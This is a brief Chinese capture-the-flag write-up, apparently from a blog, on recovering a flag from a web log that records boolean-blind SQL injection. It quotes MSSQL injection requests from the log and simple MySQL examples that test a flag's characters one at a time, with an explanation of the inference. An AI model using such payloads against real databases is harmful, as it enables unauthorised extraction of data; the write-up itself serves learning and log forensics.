[Misc ]bw 注入过程 150

下下来一个日志,先解码

搜索flag,在尾部发现布尔型盲注的日志:

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 200 0 0

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56 80 - 192.168.1.101 500 0 0

?id =1 and (select ord(substr(flag,1,1)) from flag)>96

?id =1 and (select ord(substr(flag,1,1)) from flag)>97 

学sql注入的时候猜字段,比如说>96的 时候是true 而>97是false,那么说明这个字符的ASCII值就是97

在日志里提取出flag,然后依次分析。

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/rookieDanny/p/8590502.html